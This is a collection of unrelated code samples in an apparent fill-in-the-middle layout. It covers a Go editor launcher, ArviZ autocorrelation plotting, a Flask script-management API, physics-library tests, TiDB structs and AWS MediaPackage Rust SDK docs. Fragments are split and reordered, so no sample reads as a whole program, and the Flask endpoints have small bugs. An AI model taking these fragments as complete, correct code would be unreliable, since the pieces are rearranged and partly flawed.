// Editor stores the information about an editor and its processes
type Editor struct {
path string
proc *os.Process
procState *os.ProcessState
// extra arguments to be passed to the editor process before filename(s)
Args []string
// extra process attributes to be used when spawning editor process
ProcAttrs *os.ProcAttr
}
// GetPath returns the editors executable path
func (e *Editor) GetPath() string {
return e.path
}
// Edit will start a new process and wait for the process to exit.
// If process exists with non 0 status, this will be reported as an error
func (e *Editor) Edit(files ...*os.File) error {
var err error
if err = e.Start(files...); err != nil {
return err
}
if err = e.Wait(); err != nil {
return err
}
return nil
}
// Start will start a new process and pass the list of files as arguments
func (e *Editor) Start(f ...*os.File) error {
if e.proc != nil {
return fmt.Errorf("Editor.Start: there is already an ongoing session")
}
args := []string{""}
var fds = []*os.File{os.Stdin, os.Stdout, os.Stderr}
if e.Args != nil {
for _, arg := range e.Args {
args = append(args, arg)
}
}
for _, file := range f {
args = append(args, file.Name())
fds = append(fds, file)
}
var procAttrs *os.ProcAttr
if e.ProcAttrs == nil {
procAttrs = &os.ProcAttr{
Dir: "",
Env: nil,
Files: fds,
Sys: nil,
}
} else {
procAttrs = e.ProcAttrs
}
var err error
if e.proc, err = os.StartProcess(e.path, args, procAttrs); err != nil {
return err
}
return nil
}
// Wait waits for the current editor process to exit and returns
// an error if editor exited with non 0 status
func (e *Editor) Wait() error {
var err error
if e.proc == nil {
return fmt.Errorf("Editor.Wait: no process is currently running")
}
if e.procState, err = e.proc.Wait(); err != nil {
return err
}
if !e.procState.Success() {
return fmt.Errorf("Editor.Wait: editor process exited with non 0 status: %s", e.procState.String())
}
e.clean()
return nil
}
// EditTmp will place the contents of "in" in a temp file,
// start a editor process to edit the tmp file, and return
// the contents of the tmp file after the process exits, or an error
// if editor exited with non 0 status
func (e *Editor) EditTmp(in string) (out string, err error) {
var f *os.File
var outBytes []byte
if f, err = ioutil.TempFile("/tmp", "sedit_"); err != nil {
return
}
if err = ioutil.WriteFile(f.Name(), []byte(in), 0600); err != nil {
return
}
if err = e.Edit(f); err != nil {
return
}
if outBytes, err = ioutil.ReadFile(f.Name()); err != nil {
return
}
out = string(outBytes)
return
} | }
// NewEditor will create a new Editor struct with the given executable path |
autocorrplot.py | """Autocorrelation plot of data."""
from ..data import convert_to_dataset
from ..labels import BaseLabeller
from ..sel_utils import xarray_var_iter
from ..rcparams import rcParams
from ..utils import _var_names
from .plot_utils import default_grid, filter_plotters_list, get_plotting_function
def | (
data,
var_names=None,
filter_vars=None,
max_lag=None,
combined=False,
grid=None,
figsize=None,
textsize=None,
labeller=None,
ax=None,
backend=None,
backend_config=None,
backend_kwargs=None,
show=None,
):
"""Bar plot of the autocorrelation function for a sequence of data.
Useful in particular for posteriors from MCMC samples which may display correlation.
Parameters
----------
data: obj
Any object that can be converted to an az.InferenceData object
Refer to documentation of az.convert_to_dataset for details
var_names: list of variable names, optional
Variables to be plotted. If None, all variables are plotted. Prefix the
variables by `~` when you want to exclude them from the plot. Vector-valued
stochastics are handled automatically.
filter_vars: {None, "like", "regex"}, optional, default=None
If `None` (default), interpret var_names as the real variables names. If "like",
interpret var_names as substrings of the real variables names. If "regex",
interpret var_names as regular expressions on the real variables names. A la
`pandas.filter`.
max_lag: int, optional
Maximum lag to calculate autocorrelation. Defaults to 100 or num draws, whichever is smaller
combined: bool
Flag for combining multiple chains into a single chain. If False (default), chains will be
plotted separately.
grid : tuple
Number of rows and columns. Defaults to None, the rows and columns are
automatically inferred.
figsize: tuple
Figure size. If None it will be defined automatically.
Note this is not used if ax is supplied.
textsize: float
Text size scaling factor for labels, titles and lines. If None it will be autoscaled based
on figsize.
labeller : labeller instance, optional
Class providing the method `make_label_vert` to generate the labels in the plot titles.
Read the :ref:`label_guide` for more details and usage examples.
ax: numpy array-like of matplotlib axes or bokeh figures, optional
A 2D array of locations into which to plot the densities. If not supplied, Arviz will create
its own array of plot areas (and return it).
backend: str, optional
Select plotting backend {"matplotlib","bokeh"}. Default "matplotlib".
backend_config: dict, optional
Currently specifies the bounds to use for bokeh axes. Defaults to value set in rcParams.
backend_kwargs: dict, optional
These are kwargs specific to the backend being used. For additional documentation
check the plotting method of the backend.
show: bool, optional
Call backend show function.
Returns
-------
axes: matplotlib axes or bokeh figures
Examples
--------
Plot default autocorrelation
.. plot::
:context: close-figs
>>> import arviz as az
>>> data = az.load_arviz_data('centered_eight')
>>> az.plot_autocorr(data)
Plot subset variables by specifying variable name exactly
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['mu', 'tau'] )
Combine chains by variable and select variables by excluding some with partial naming
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['~thet'], filter_vars="like", combined=True)
Specify maximum lag (x axis bound)
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['mu', 'tau'], max_lag=200, combined=True)
"""
data = convert_to_dataset(data, group="posterior")
var_names = _var_names(var_names, data, filter_vars)
# Default max lag to 100 or max length of chain
if max_lag is None:
max_lag = min(100, data["draw"].shape[0])
if labeller is None:
labeller = BaseLabeller()
plotters = filter_plotters_list(
list(xarray_var_iter(data, var_names, combined)), "plot_autocorr"
)
rows, cols = default_grid(len(plotters), grid=grid)
autocorr_plot_args = dict(
axes=ax,
plotters=plotters,
max_lag=max_lag,
figsize=figsize,
rows=rows,
cols=cols,
combined=combined,
textsize=textsize,
labeller=labeller,
backend_kwargs=backend_kwargs,
show=show,
)
if backend is None:
backend = rcParams["plot.backend"]
backend = backend.lower()
if backend == "bokeh":
autocorr_plot_args.update(backend_config=backend_config)
# TODO: Add backend kwargs
plot = get_plotting_function("plot_autocorr", "autocorrplot", backend)
axes = plot(**autocorr_plot_args)
return axes
| plot_autocorr |
scripts.py | from flask import Blueprint, request, make_response, jsonify
from sqlalchemy import and_
from sqlalchemy.orm import query
from tester_web.tables import db_session
from tester_web.tables.user import User, Api, Script, ApiUser, UserScript
scripts = Blueprint('scripts', __name__,url_prefix='/scripts')
@scripts.route('/list',methods=['get'])
def script_list(*args,**kwargs):
# db_session.query()
username = request.json.get("username")
api = request.json.get("api")
try:
if username is not None and api is None:
user = db_session.query(User).filter_by(username=username).one()
user_apis = db_session.query(UserScript.id).filter_by(user_id=user.id).all()
| for script in scripts:
data = {"id":script.id,"description":script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200,"msg":content}))
elif username is None and api is not None:
content = []
api = db_session.query(Api).filter_by(api=api).one()
user_apis = db_session.query(UserScript.id).filter_by(api_id=api.id).all()
scripts = db_session.query(Script).filter(Script.api_user_id.in_(user_apis)).all()
for script in scripts:
data = {"id":script.id,"description":script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200, "msg": content}))
else:
user = db_session.query(User).filter_by(username=username).one()
api = db_session.query(Api).filter_by(api=api).one()
user_api = db_session.query(UserScript.id).filter_by(user_id=user.id).filter_by(api_id=api.id).one()
script = db_session.query(Script).filter_by(api_user_id=user_api).one()
content = []
data = {"id": script.id, "description": script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200, "msg": content}))
except Exception as e:
return make_response(jsonify({"code": 404, "error_msg": e}))
@scripts.route('/add',methods=['post'])
def script_add(*args,**kwargs):
# The user adds a script themselves, or ...
username = request.json.get('username')
api_description = request.json.get('api_description')
try:
user = db_session.query(User).filter_by(username=username).one()
user_id = user.id
api = db_session.query(Api).filter_by(api_description=api_description).one()
api_id = api.id
api_user = db_session.query(ApiUser).filter_by(user_id=user_id,api_id=api_id).one()
api_user_id = api_user.id
except Exception as e:
return make_response(jsonify({"code": 404,"error_msg":e}))
script_content = request.json.get('script_content')
description = request.json.get('script_description')
try:
script = Script(api_user_id=api_user_id,script_content=script_content,description=description)
db_session.add(script)
db_session.commit()
return make_response(jsonify({"code": 200,"msg": u'脚本添加成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "error_msg": e}))
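# Illustrative request for the /add endpoint above (field names as parsed
# there; the values are hypothetical):
# POST /scripts/add
# {"username": "alice", "api_description": "create order",
#  "script_content": "...", "script_description": "smoke test"}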
@scripts.route('/adduser',methods=['post'])
def script_adduser(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
try:
userscript = UserScript(user_id=user_id,script_id=script_id)
db_session.add(userscript)
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'添加用户成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
# Grant a user permission on a script; everyone can see the script, but only users with permission can modify it
@scripts.route('/delete',methods=['post'])
def script_delete(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
try:
script = db_session.query(UserScript).filter_by(user_id=user_id).filter_by(script_id=script_id).one()
if script.id is not None:
db_session.query(Script).filter_by(id=script_id).delete()
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'脚本删除成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
@scripts.route('/upgrade',methods=['post'])
def script_upgrade(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
script_content = request.json.get('script_content')
description = request.json.get('script_description')
try:
script = db_session.query(UserScript).filter_by(user_id=user_id).filter_by(script_id=script_id).one()
if script.id is not None:
db_session.query(Script).filter_by(id=script_id).update({"script_content": script_content, "description": description})
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'脚本更新成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
@scripts.route('/run',methods=['POST'])
def script_run(*args,**kwargs):
pass | scripts = db_session.query(Script).filter(Script.api_user_id.in_(user_apis)).all()
content = []
|
test_energy_regressor.py | from tempfile import TemporaryDirectory
import numpy as np
from numpy.testing import assert_allclose
from astropy import units as u
from ctapipe.reco.energy_regressor import EnergyRegressor
def test_prepare_model():
cam_id_list = ["FlashCam", "ASTRICam"]
feature_list = {"FlashCam": [[1, 10], [2, 20], [3, 30], [0.9, 9],
],
"ASTRICam": [[10, 1], [20, 2], [30, 3], [9, 0.9],
]}
target_list = {"FlashCam": np.array([1, 2, 3, 0.9]) * u.TeV,
"ASTRICam": np.array([1, 2, 3, 0.9]) * u.TeV}
reg = EnergyRegressor(cam_id_list=cam_id_list, n_estimators=10)
reg.fit(feature_list, target_list)
return reg, cam_id_list
def | ():
reg, cam_id_list = test_prepare_model()
with TemporaryDirectory() as d:
temp_path = "/".join([d, "reg_{cam_id}.pkl"])
reg.save(temp_path)
reg = EnergyRegressor.load(temp_path, cam_id_list)
return reg, cam_id_list
def test_predict_by_event():
np.random.seed(3)
reg, cam_id_list = test_fit_save_load()
prediction = reg.predict_by_event([{"ASTRICam": [[10, 1]]},
{"ASTRICam": [[20, 2]]},
{"ASTRICam": [[30, 3]]}])
assert_allclose(prediction["mean"].value, [1, 2, 3], rtol=0.2)
prediction = reg.predict_by_event([{"FlashCam": [[1, 10]]},
{"FlashCam": [[2, 20]]},
{"FlashCam": [[3, 30]]}])
assert_allclose(prediction["mean"].value, [1, 2, 3], rtol=0.2)
| test_fit_save_load |
clusterinfo.go | // Copyright 2020 PingCAP, Inc. | //
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package clusterinfo
type ComponentStatus uint
const (
// ComponentStatusUnreachable means unreachable or disconnected
ComponentStatusUnreachable ComponentStatus = 0
ComponentStatusUp ComponentStatus = 1
ComponentStatusTombstone ComponentStatus = 2
ComponentStatusOffline ComponentStatus = 3
// PD's Store may have state name down.
ComponentStatusDown ComponentStatus = 4
)
type PDInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
DeployPath string `json:"deploy_path"`
Status ComponentStatus `json:"status"`
StartTimestamp int64 `json:"start_timestamp"`
}
type TiDBInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
Status ComponentStatus `json:"status"`
StatusPort uint `json:"status_port"`
StartTimestamp int64 `json:"start_timestamp"`
}
type TiKVInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
Status ComponentStatus `json:"status"`
StatusPort uint `json:"status_port"`
Labels map[string]string `json:"labels"`
StartTimestamp int64 `json:"start_timestamp"`
}
type AlertManagerInfo struct {
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
}
type GrafanaInfo struct {
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
} | //
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
test.js | var test = require('tape')
var flash = require('./')
test('noop on server side', function (t) { | t.plan(1)
t.doesNotThrow(function () { flash('whatever') })
}) | |
client.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
#[derive(Debug)]
pub(crate) struct Handle {
pub(crate) client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
pub(crate) conf: crate::Config,
}
/// Client for AWS Elemental MediaPackage
///
/// Client for invoking operations on AWS Elemental MediaPackage. Each operation on AWS Elemental MediaPackage is a method on
/// this struct. `.send()` MUST be invoked on the generated operations to dispatch the request to the service.
///
/// # Examples
/// **Constructing a client and invoking an operation**
/// ```rust,no_run
/// # async fn docs() {
/// // create a shared configuration. This can be used & shared between multiple service clients.
/// let shared_config = aws_config::load_from_env().await;
/// let client = aws_sdk_mediapackage::Client::new(&shared_config);
/// // invoke an operation
/// /* let rsp = client
/// .<operation_name>().
/// .<param>("some value")
/// .send().await; */
/// # }
/// ```
/// **Constructing a client with custom configuration**
/// ```rust,no_run
/// use aws_config::RetryConfig;
/// # async fn docs() {
/// let shared_config = aws_config::load_from_env().await;
/// let config = aws_sdk_mediapackage::config::Builder::from(&shared_config)
/// .retry_config(RetryConfig::disabled())
/// .build();
/// let client = aws_sdk_mediapackage::Client::from_conf(config);
/// # }
/// ```
#[derive(std::fmt::Debug)]
pub struct Client {
handle: std::sync::Arc<Handle>,
}
impl std::clone::Clone for Client {
fn clone(&self) -> Self {
Self {
handle: self.handle.clone(),
}
}
}
#[doc(inline)]
pub use aws_smithy_client::Builder;
impl
From<
aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
> for Client
{
fn from(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
) -> Self {
Self::with_config(client, crate::Config::builder().build())
}
}
impl Client {
/// Creates a client with the given service configuration.
pub fn with_config(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
conf: crate::Config,
) -> Self {
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Returns the client's configuration.
pub fn conf(&self) -> &crate::Config {
&self.handle.conf
}
}
impl Client {
/// Constructs a fluent builder for the [`ConfigureLogs`](crate::client::fluent_builders::ConfigureLogs) operation.
///
/// - The fluent builder is configurable:
/// - [`egress_access_logs(EgressAccessLogs)`](crate::client::fluent_builders::ConfigureLogs::egress_access_logs) / [`set_egress_access_logs(Option<EgressAccessLogs>)`](crate::client::fluent_builders::ConfigureLogs::set_egress_access_logs): Configure egress access logging.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::ConfigureLogs::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::ConfigureLogs::set_id): The ID of the channel to log subscription.
/// - [`ingress_access_logs(IngressAccessLogs)`](crate::client::fluent_builders::ConfigureLogs::ingress_access_logs) / [`set_ingress_access_logs(Option<IngressAccessLogs>)`](crate::client::fluent_builders::ConfigureLogs::set_ingress_access_logs): Configure ingress access logging.
/// - On success, responds with [`ConfigureLogsOutput`](crate::output::ConfigureLogsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::ConfigureLogsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::ConfigureLogsOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::ConfigureLogsOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::ConfigureLogsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::ConfigureLogsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::ConfigureLogsOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ConfigureLogsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<ConfigureLogsError>`](crate::error::ConfigureLogsError)
pub fn configure_logs(&self) -> fluent_builders::ConfigureLogs {
fluent_builders::ConfigureLogs::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateChannel`](crate::client::fluent_builders::CreateChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateChannel::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateChannel::set_description): A short text description of the Channel.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateChannel::set_id): The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateChannel::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateChannel::set_tags): A collection of tags associated with a resource
/// - On success, responds with [`CreateChannelOutput`](crate::output::CreateChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::CreateChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::CreateChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::CreateChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::CreateChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::CreateChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::CreateChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<CreateChannelError>`](crate::error::CreateChannelError)
pub fn create_channel(&self) -> fluent_builders::CreateChannel {
fluent_builders::CreateChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateHarvestJob`](crate::client::fluent_builders::CreateHarvestJob) operation.
///
/// - The fluent builder is configurable:
/// - [`end_time(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::end_time) / [`set_end_time(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_end_time): The end of the time-window which will be harvested
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
/// - [`origin_endpoint_id(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::origin_endpoint_id) / [`set_origin_endpoint_id(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(S3Destination)`](crate::client::fluent_builders::CreateHarvestJob::s3_destination) / [`set_s3_destination(Option<S3Destination>)`](crate::client::fluent_builders::CreateHarvestJob::set_s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::start_time) / [`set_start_time(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_start_time): The start of the time-window which will be harvested
/// - On success, responds with [`CreateHarvestJobOutput`](crate::output::CreateHarvestJobOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateHarvestJobOutput::arn): The Amazon Resource Name (ARN) assigned to the HarvestJob.
/// - [`channel_id(Option<String>)`](crate::output::CreateHarvestJobOutput::channel_id): The ID of the Channel that the HarvestJob will harvest from.
/// - [`created_at(Option<String>)`](crate::output::CreateHarvestJobOutput::created_at): The time the HarvestJob was submitted
/// - [`end_time(Option<String>)`](crate::output::CreateHarvestJobOutput::end_time): The end of the time-window which will be harvested.
/// - [`id(Option<String>)`](crate::output::CreateHarvestJobOutput::id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted.
/// - [`origin_endpoint_id(Option<String>)`](crate::output::CreateHarvestJobOutput::origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(Option<S3Destination>)`](crate::output::CreateHarvestJobOutput::s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(Option<String>)`](crate::output::CreateHarvestJobOutput::start_time): The start of the time-window which will be harvested.
/// - [`status(Option<Status>)`](crate::output::CreateHarvestJobOutput::status): The current status of the HarvestJob. Consider setting up a CloudWatch Event to listen for HarvestJobs as they succeed or fail. In the event of failure, the CloudWatch Event will include an explanation of why the HarvestJob failed.
/// - On failure, responds with [`SdkError<CreateHarvestJobError>`](crate::error::CreateHarvestJobError)
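    ///
    /// A hand-written usage sketch; the crate name `aws_sdk_mediapackage` is assumed, the IDs, times, and ARN are placeholders, and the `S3Destination` field names (`bucket_name`, `manifest_key`, `role_arn`) are assumed from the MediaPackage API.
    /// ```no_run
    /// use aws_sdk_mediapackage::model::S3Destination;
    ///
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     // Where the harvested clip should be written (all values are placeholders).
    ///     let destination = S3Destination::builder()
    ///         .bucket_name("my-harvest-bucket")
    ///         .manifest_key("harvested/my-endpoint/index.m3u8")
    ///         .role_arn("arn:aws:iam::123456789012:role/MediaPackageHarvestRole")
    ///         .build();
    ///     let resp = client
    ///         .create_harvest_job()
    ///         .id("my-harvest-job")
    ///         .origin_endpoint_id("my-endpoint")
    ///         .start_time("2021-01-01T00:00:00Z")
    ///         .end_time("2021-01-01T01:00:00Z")
    ///         .s3_destination(destination)
    ///         .send()
    ///         .await?;
    ///     println!("harvest job status: {:?}", resp.status());
    ///     Ok(())
    /// }
    /// ```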
pub fn create_harvest_job(&self) -> fluent_builders::CreateHarvestJob {
fluent_builders::CreateHarvestJob::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateOriginEndpoint`](crate::client::fluent_builders::CreateOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`authorization(Authorization)`](crate::client::fluent_builders::CreateOriginEndpoint::authorization) / [`set_authorization(Option<Authorization>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_authorization): CDN Authorization credentials
/// - [`channel_id(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::channel_id) / [`set_channel_id(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_channel_id): The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
/// - [`cmaf_package(CmafPackageCreateOrUpdateParameters)`](crate::client::fluent_builders::CreateOriginEndpoint::cmaf_package) / [`set_cmaf_package(Option<CmafPackageCreateOrUpdateParameters>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(DashPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::dash_package) / [`set_dash_package(Option<DashPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_description): A short text description of the OriginEndpoint.
/// - [`hls_package(HlsPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::hls_package) / [`set_hls_package(Option<HlsPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_id): The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
/// - [`manifest_name(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::manifest_name) / [`set_manifest_name(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_manifest_name): A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
/// - [`mss_package(MssPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::mss_package) / [`set_mss_package(Option<MssPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
    /// - [`origination(Origination)`](crate::client::fluent_builders::CreateOriginEndpoint::origination) / [`set_origination(Option<Origination>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
/// - [`startover_window_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::startover_window_seconds) / [`set_startover_window_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::set_startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateOriginEndpoint::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::time_delay_seconds) / [`set_time_delay_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::set_time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`whitelist(Vec<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::whitelist) / [`set_whitelist(Option<Vec<String>>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On success, responds with [`CreateOriginEndpointOutput`](crate::output::CreateOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::CreateOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::CreateOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::CreateOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::CreateOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::CreateOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::CreateOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::CreateOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::CreateOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::CreateOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
    /// - [`origination(Option<Origination>)`](crate::output::CreateOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
/// - [`startover_window_seconds(i32)`](crate::output::CreateOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::CreateOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::CreateOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::CreateOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::CreateOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<CreateOriginEndpointError>`](crate::error::CreateOriginEndpointError)
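    ///
    /// A hand-written usage sketch; the crate name `aws_sdk_mediapackage` and all IDs are placeholders, and `segment_duration_seconds` on `HlsPackage` is an assumed field name.
    /// ```no_run
    /// use aws_sdk_mediapackage::model::HlsPackage;
    ///
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
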